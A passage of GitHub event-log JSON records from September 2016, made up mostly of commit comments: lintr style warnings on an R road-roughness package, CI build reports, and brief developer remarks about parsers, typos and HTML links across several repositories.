~^~\n```\n[inst/kla/experiments.R:34:62:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L34) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​if ((profile_length-buffer_look_ahead-1) %% seg_length == 0) { # this considers, that the iri calculation needs normaly just k-1 smaples, not for the first calculation per segment\n                                                             ^\n```\n[inst/kla/experiments.R:39:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/kla/experiments.R:39:35:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L39) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                  ^\n```\n[inst/kla/experiments.R:39:58:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                        ~^~\n```\n[inst/kla/experiments.R:39:69:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                                   ~^~\n```\n[inst/kla/experiments.R:39:71:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                                     ~^~\n```\n[inst/kla/experiments.R:39:91:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L39) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​ends <- sapply(starts, function(x){ min(profile_length, x+seg_length-1+buffer_look_ahead) })\n                                                                                          ^\n```\n[inst/kla/experiments.R:42:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L42) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:43:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L43) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:44:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L44) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:45:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L45) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/kla/experiments.R:46:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/inst/kla/experiments.R#L46) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/iri.R:22:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​  CalculateIRIperSegmentsOverlapping(profile, iri_coef, segment.length, segment.length)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:45:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​CalculateIRIperSegmentsOverlapping <- function(profile, iri_coef, segment.length = 100, segment.offset = 20) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:51:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L51) *style:* **lines should not be more than 80 characters.**\n```r\n​  K <- max(2, as.integer(.5 + .25 / DX) + 1)  # number of profile points used to compute mvg avg slope input (window)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:52:3:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L52) *warning:* **local variable ‘BL’ assigned but may not be used**\n```r\n​  BL <- (K - 1) * DX  # baselength\n  ^~\n```\n[R/iri.R:54:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​  # split profile into segments by defining starting and ending indices (e.g. per 100m segment considering offsets)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:58:19:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L58) *style:* **Commas should always have a space after.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                  ^\n```\n[R/iri.R:58:34:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                ~^~\n```\n[R/iri.R:58:53:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L58) *style:* **Commas should always have a space after.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                                    ^\n```\n[R/iri.R:58:55:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​  starts <- seq(1,length(profile)-buffer_look_ahead,by=num_samples_per_offset)\n                                                     ~^~\n```\n[R/iri.R:59:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L59) *style:* **lines should not be more than 80 characters.**\n```r\n​  # if there is exactly one sample missing for calculating initial IRI for next segment, delete last segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:60:7:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L60) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n      ^\n```\n[R/iri.R:60:23:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n                     ~^~\n```\n[R/iri.R:60:41:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​  if ((length(profile)-buffer_look_ahead-1) %% num_samples_per_offset == 0) {\n                                       ~^~\n```\n[R/iri.R:63:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L63) *style:* **lines should not be more than 80 characters.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:63:37:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L63) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                    ^\n```\n[R/iri.R:63:61:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                           ~^~\n```\n[R/iri.R:63:85:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                   ~^~\n```\n[R/iri.R:63:87:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                     ~^~\n```\n[R/iri.R:63:107:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L63) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​  ends <- sapply(starts, function(x){ min(length(profile), x+num_samples_per_segment-1+buffer_look_ahead) })\n                                                                                                          ^\n```\n[R/iri.R:108:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L108) *style:* **lines should not be more than 80 characters.**\n```r\n​  K <- max(2, as.integer(.5 + .25 / DX) + 1)  # number of profile points used to compute mvg avg slope input (window)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:116:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n​  # sliding window of profil elevations for calculating mvg avg slope (buffer of length K)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/iri.R:129:3:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L129) *warning:* **local variable ‘iri_df’ assigned but may not be used**\n```r\n​  iri_df <- data.frame()  # df for colleteing return values\n  ^~~~~~\n```\n[R/iri.R:152:10:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L152) *style:* **Put spaces around all infix operators.**\n```r\n​      y[j-1] <- y[j]\n        ~^~\n```\n[R/iri.R:160:29:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L160) *style:* **Commas should always have a space after.**\n```r\n​        z[j] <- z[j] + ST[j,jj] * z_last[jj]\n                            ^\n```\n[R/iri.R:163:24:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L163) *style:* **Put spaces around all infix operators.**\n```r\n​    rs <- rs + abs(z[1]- z[3])\n                      ~^\n```\n[R/iri.R:168:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/iri.R#L168) *style:* **lines should not be more than 80 characters.**\n```r\n​    # determine avg rs by dividing by number of considered samples and attach to result vector\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/rroad-package.R:30:1:](https://github.com/vsimko/rroad/blob/565ef3a92e9da7133ad9a03524eb4b0b710fd842/R/rroad-package.R#L30) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-08T15:02:57Z"}
{"id":"4534607895","type":"CommitCommentEvent","actor":{"login":"soumith"},"repo":{"name":"torch/torch7"},"payload":{"comment":{"id":18946337,"position":null,"line":null,"path":null,"commit_id":"df191583ab794dd8e82a101f1d17436902ee5152","created_at":"2016-09-08T15:03:02Z","updated_at":"2016-09-08T15:03:02Z","body":"@rlebret thanks fixed in master"}},"created_at":"2016-09-08T15:03:02Z"}
{"id":"4534608126","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18946340,"position":5,"line":224,"path":"plugin-ceylon-code/source/org/intellij/plugins/ceylon/ide/ceylonCode/model/IdeaModelLoader.ceylon","commit_id":"59205604762e7e0f61ef17e5aeaaeda687bb6e72","created_at":"2016-09-08T15:03:05Z","updated_at":"2016-09-08T15:03:05Z","body":"From what I've seen, archives are always reindexed *before* this code is run, so hopefully the VirtualFile should always be up-to-date."}},"created_at":"2016-09-08T15:03:05Z"}
{"id":"4534609402","type":"CommitCommentEvent","actor":{"login":"thuyhatran"},"repo":{"name":"thuyhatran/StudentAd-Spring-Hibernate-Eclipse-Maven"},"payload":{"comment":{"id":18946345,"position":null,"line":null,"path":null,"commit_id":"da18a9c327d40d194f4b02cb67fccac67090dd37","created_at":"2016-09-08T15:03:18Z","updated_at":"2016-09-08T15:03:18Z","body":"Didn't need to add \r\nPUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\">  "}},"created_at":"2016-09-08T15:03:18Z"}
{"id":"4534613321","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18946353,"position":5,"line":224,"path":"plugin-ceylon-code/source/org/intellij/plugins/ceylon/ide/ceylonCode/model/IdeaModelLoader.ceylon","commit_id":"59205604762e7e0f61ef17e5aeaaeda687bb6e72","created_at":"2016-09-08T15:03:54Z","updated_at":"2016-09-08T15:03:54Z","body":"OK, cool\r\n"}},"created_at":"2016-09-08T15:03:54Z"}
{"id":"4534613617","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":18946355,"position":null,"line":null,"path":null,"commit_id":"bc621b2e2c805b8b0af4fad3f2aab65f56569ba3","created_at":"2016-09-08T15:03:57Z","updated_at":"2016-09-08T15:03:57Z","body":"That'll come after 1.3.0, see https://gitter.im/ceylon/ceylon-ide-intellij?at=57d17c3080da643d6535d6ab"}},"created_at":"2016-09-08T15:03:57Z"}
{"id":"4534617531","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18946363,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T15:04:31Z","updated_at":"2016-09-08T15:04:31Z","body":"Alex,\r\n\r\n>>    why do we need a rule for non_reserved_word ?\r\n\r\n> It makes it possible to use non-reserved keywords as generic identifiers (table name, field name, variable name. etc.)\r\n\r\nI mean - we already know list of non-reserved words (see keywords.cpp). Why not use it instead of parser rule ?"}},"created_at":"2016-09-08T15:04:31Z"}
{"id":"4534620263","type":"CommitCommentEvent","actor":{"login":"oli-g"},"repo":{"name":"anryko/grafana-influx-dashboard"},"payload":{"comment":{"id":18946372,"position":53,"line":692,"path":"getdash.conf.js","commit_id":"d55d98ced609e1eb4e948390102528fdd15f8d9d","created_at":"2016-09-08T15:04:54Z","updated_at":"2016-09-08T15:04:54Z","body":"Typo, I think it should be `psCount ` ;)"}},"created_at":"2016-09-08T15:04:54Z"}
{"id":"4534623589","type":"CommitCommentEvent","actor":{"login":"asimarslan"},"repo":{"name":"hazelcast/hazelcast-simulator"},"payload":{"comment":{"id":18946384,"position":null,"line":null,"path":null,"commit_id":"ab45b52b8c2f06f068fb693e5e70b7a2663656f3","created_at":"2016-09-08T15:05:24Z","updated_at":"2016-09-08T15:05:24Z","body":"@pveentjer What about `IntegrationTestOperation` and `LogOperation` ?"}},"created_at":"2016-09-08T15:05:24Z"}
{"id":"4534626705","type":"CommitCommentEvent","actor":{"login":"jgranick"},"repo":{"name":"HaxeFoundation/hxcpp"},"payload":{"comment":{"id":18946392,"position":null,"line":null,"path":null,"commit_id":"743d83cf76f56d1a0bae7e898cbf0ee8a455dd26","created_at":"2016-09-08T15:05:51Z","updated_at":"2016-09-08T15:05:51Z","body":"I just experienced a project where `EReg` crashes unless PCRE has -DNO_RECURSE\r\n\r\nI don't know if it would be better to use NO_RECURSE on all platforms for consistency (and crash safety), though Windows appears to be more susceptible in testing (and based on the comments in the PCRE source regarding the define)\r\n\r\nI understand this has performance implications (maybe 15-20%) so I wanted to mention this "}},"created_at":"2016-09-08T15:05:51Z"}
{"id":"4534627989","type":"CommitCommentEvent","actor":{"login":"NzV"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18946395,"position":null,"line":null,"path":null,"commit_id":"6f4aa0d121bec18032d2ac465c4698e96224404a","created_at":"2016-09-08T15:06:03Z","updated_at":"2016-09-08T15:06:03Z","body":" <Prefer32Bit>true</Prefer32Bit> force x86 build on AnyCPU"}},"created_at":"2016-09-08T15:06:03Z"}
{"id":"4534628169","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18946397,"position":null,"line":null,"path":null,"commit_id":"5200dc4dbe29783cbc55400692d3f395506621b3","created_at":"2016-09-08T15:06:05Z","updated_at":"2016-09-08T15:06:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 973](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12979&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-08T15:06:05Z"}
{"id":"4534630652","type":"CommitCommentEvent","actor":{"login":"mpoapostolis"},"repo":{"name":"mpoapostolis/Diathymia"},"payload":{"comment":{"id":18946400,"position":null,"line":null,"path":null,"commit_id":"ec1e37625bbc9ddb31fba7c7993ef96010513478","created_at":"2016-09-08T15:06:25Z","updated_at":"2016-09-08T15:06:25Z","body":"dn eftiaksa akoma to effe otan xtipaei o irwas minion-----"}},"created_at":"2016-09-08T15:06:25Z"}
{"id":"4534633914","type":"CommitCommentEvent","actor":{"login":"agoetzke"},"repo":{"name":"githubschool/github-games"},"payload":{"comment":{"id":18946411,"position":null,"line":null,"path":null,"commit_id":"a96769a97cd034e13731b49c142ed2c3c4ecc821","created_at":"2016-09-08T15:06:52Z","updated_at":"2016-09-08T15:06:52Z","body":"Boo."}},"created_at":"2016-09-08T15:06:52Z"}
{"id":"4534634086","type":"CommitCommentEvent","actor":{"login":"leninmedeiros"},"repo":{"name":"leninmedeiros/stress-support-bot"},"payload":{"comment":{"id":18946412,"position":null,"line":null,"path":null,"commit_id":"939c8882b1dc910d8470dd1c5f759e928a8da326","created_at":"2016-09-08T15:06:54Z","updated_at":"2016-09-08T15:06:54Z","body":"The output must be \"{'id': 295930409, 'username': 'stress_support_bot', 'first_name': 'Stress Support Bot'}\"."}},"created_at":"2016-09-08T15:06:54Z"}
{"id":"4534639770","type":"CommitCommentEvent","actor":{"login":"ligi"},"repo":{"name":"chibatching/Kotpref"},"payload":{"comment":{"id":18946430,"position":null,"line":null,"path":null,"commit_id":"143107183dc914e2a549b748b5b597ef364a659b","created_at":"2016-09-08T15:07:41Z","updated_at":"2016-09-08T15:07:41Z","body":"thanks for the follow-up!\n"}},"created_at":"2016-09-08T15:07:41Z"}
{"id":"4534643277","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18946437,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T15:08:14Z","updated_at":"2016-09-08T15:08:14Z","body":"Vlad, now I'm afraid to look stupid but I have no idea how to pass that information to grammar parser generated by btyacc."}},"created_at":"2016-09-08T15:08:14Z"}
{"id":"4534644334","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18946440,"position":null,"line":null,"path":null,"commit_id":"e9fb9c8243a21206966465f43eed508c4a5f3873","created_at":"2016-09-08T15:08:21Z","updated_at":"2016-09-08T15:08:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 972](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12976&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:54"}},"created_at":"2016-09-08T15:08:21Z"}
{"id":"4534648103","type":"CommitCommentEvent","actor":{"login":"weiqsun"},"repo":{"name":"githubschool/github-games"},"payload":{"comment":{"id":18946450,"position":null,"line":null,"path":null,"commit_id":"683817694503e2a86e4d38c9f3da20b95ea2f8ce","created_at":"2016-09-08T15:08:53Z","updated_at":"2016-09-08T15:08:53Z","body":"changed background color"}},"created_at":"2016-09-08T15:08:53Z"}
{"id":"4534650131","type":"CommitCommentEvent","actor":{"login":"thuyhatran"},"repo":{"name":"thuyhatran/StudentAd-Spring-Hibernate-Eclipse-Maven"},"payload":{"comment":{"id":18946454,"position":null,"line":null,"path":null,"commit_id":"da18a9c327d40d194f4b02cb67fccac67090dd37","created_at":"2016-09-08T15:09:13Z","updated_at":"2016-09-08T15:09:13Z","body":"These links below:\r\n<a href=\"/StudentApp/student/form?siteLanguage=en\">English</a>|\r\n<a href=\"/StudentApp/student/form?siteLanguage=fr\">Francais</a>\r\n\r\nshould be modified (/student/form) to work for the case as \"edit call\" (ex: student/edit3 with data of student whose id=3)"}},"created_at":"2016-09-08T15:09:13Z"}
{"id":"4534652699","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18946460,"position":3,"line":3,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-08T15:09:34Z","updated_at":"2016-09-08T15:09:34Z","body":"I mean, off the record messaging is defined in Ian's original paper. Should we try to use more language from that?"}},"created_at":"2016-09-08T15:09:34Z"}
{"id":"4534653772","type":"CommitCommentEvent","actor":{"login":"oli-g"},"repo":{"name":"anryko/grafana-influx-dashboard"},"payload":{"comment":{"id":18946461,"position":97,"line":736,"path":"getdash.conf.js","commit_id":"d55d98ced609e1eb4e948390102528fdd15f8d9d","created_at":"2016-09-08T15:09:44Z","updated_at":"2016-09-08T15:09:44Z","body":"Typo here too, should be `maxflt` I think. It should be the cause of this little glitch, where max is always 0:\r\n\r\n![screenshot 2016-09-08 17 07 31](https://cloud.githubusercontent.com/assets/440821/18354677/c5abaafe-75e6-11e6-9a09-e23df0a815e5.png)\r\n\r\nAnd of course, set the colors 😉 "}},"created_at":"2016-09-08T15:09:44Z"}
{"id":"4534657353","type":"CommitCommentEvent","actor":{"login":"thuyhatran"},"repo":{"name":"thuyhatran/StudentAd-Spring-Hibernate-Eclipse-Maven"},"payload":{"comment":{"id":18946469,"position":null,"line":null,"path":null,"commit_id":"da18a9c327d40d194f4b02cb67fccac67090dd37","created_at":"2016-09-08T15:10:18Z","updated_at":"2016-09-08T15:10:18Z","body":"a href=\"/StudentApp/student/form?siteLanguage=en\">English</a  |\r\n\t\ta href=\"/StudentApp/student/form?siteLanguage=fr\">Francais</a "}},"created_at":"2016-09-08T15:10:18Z"}
{"id":"4534658021","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18946472,"position":null,"line":null,"path":null,"commit_id":"d47c3aa476f8f0532661e5dc82c75ccde8823ce7","created_at":"2016-09-08T15:10:23Z","updated_at":"2016-09-08T15:10:23Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/18/violations\n```\nplone/app/drafts/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/drafts/__init__.py:9:1: F401 'getCurrentDraft' imported but unused\nplone/app/drafts/dexterity.py:142:1: C901 'autosave' is too complex (15)\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-08T15:10:23Z"}
{"id":"4534662977","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18946482,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T15:11:07Z","updated_at":"2016-09-08T15:11:07Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2367 of 2368 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T15:11:07Z"}
{"id":"4534669030","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"batiste/django-page-cms"},"payload":{"comment":{"id":18946495,"position":3,"line":2,"path":"requirements-doc.txt","commit_id":"30f0f3a976bb751f6466e6ae14e9e73081e1557c","created_at":"2016-09-08T15:12:03Z","updated_at":"2016-09-08T15:12:03Z","body":"`full` includes `Django`, right?"}},"created_at":"2016-09-08T15:12:03Z"}
{"id":"4534669356","type":"CommitCommentEvent","actor":{"login":"sholladay"},"repo":{"name":"sholladay/build-files"},"payload":{"comment":{"id":18946496,"position":24,"line":24,"path":"index.js","commit_id":"d6b1997610238e29905f29047f1fc0c0784857be","created_at":"2016-09-08T15:12:07Z","updated_at":"2016-09-08T15:12:07Z","body":"Fixed by https://github.com/sholladay/build-files/commit/d24262f5a22d7b1da382e7f144f3d490299f140f.\r\n\r\nHere it is [in the README](https://github.com/sholladay/build-files#includebranchlatest)."}},"created_at":"2016-09-08T15:12:07Z"}
{"id":"4534669547","type":"CommitCommentEvent","actor":{"login":"dgasmith"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18946498,"position":31,"line":308,"path":"psi4/share/psi4/python/molutil.py","commit_id":"04f9b104db7f7e8ad30eea0aa355e6bfbd3c644f","created_at":"2016-09-08T15:12:09Z","updated_at":"2016-09-08T15:12:09Z","body":"No, this is too general as it overwrite *all* attributes on a class. Removed for now, out of curiosity why is it here?"}},"created_at":"2016-09-08T15:12:09Z"}
{"id":"4534669985","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18946500,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T15:12:14Z","updated_at":"2016-09-08T15:12:14Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-08T15:12:14Z"}
